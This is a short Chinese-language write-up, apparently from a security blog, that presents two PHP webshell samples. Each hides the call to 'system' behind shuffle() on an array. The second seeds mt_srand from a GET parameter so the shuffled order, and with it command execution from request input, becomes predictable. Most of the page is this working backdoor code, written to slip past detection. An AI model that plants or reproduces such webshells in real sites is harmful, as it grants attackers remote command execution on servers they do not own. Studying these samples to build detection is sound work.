目录
样本
php
<?php
$a = array("t", "system");
shuffle($a);
$a[0]($_POST[1]);通过 shuffle 函数打乱数组,然后通过$a0取出第一个元素,打乱后第一个元素可能是t也可能是system。然后再进行POST传参进行命令执行。
这里抓包可以正常执行
样本修改
对于shuffle函数来说,他的随机是伪随机,我们可以通过对其代码的分析然后预测数组中元素打乱的规律。对于sheuffle来说底层调用的是mt_rand来生成随机值,以次控制打乱的数组中的元素的顺序。然后对于mt_rand来说当他的种子定好他的随机值就不会发生改变了。
php
<?php
$arr = array("t","a","s","system");
function shift(&$arr){
mt_srand($_GET[0]);
shuffle($arr);
}
shift($arr);
$arr[2]($_GET[1]);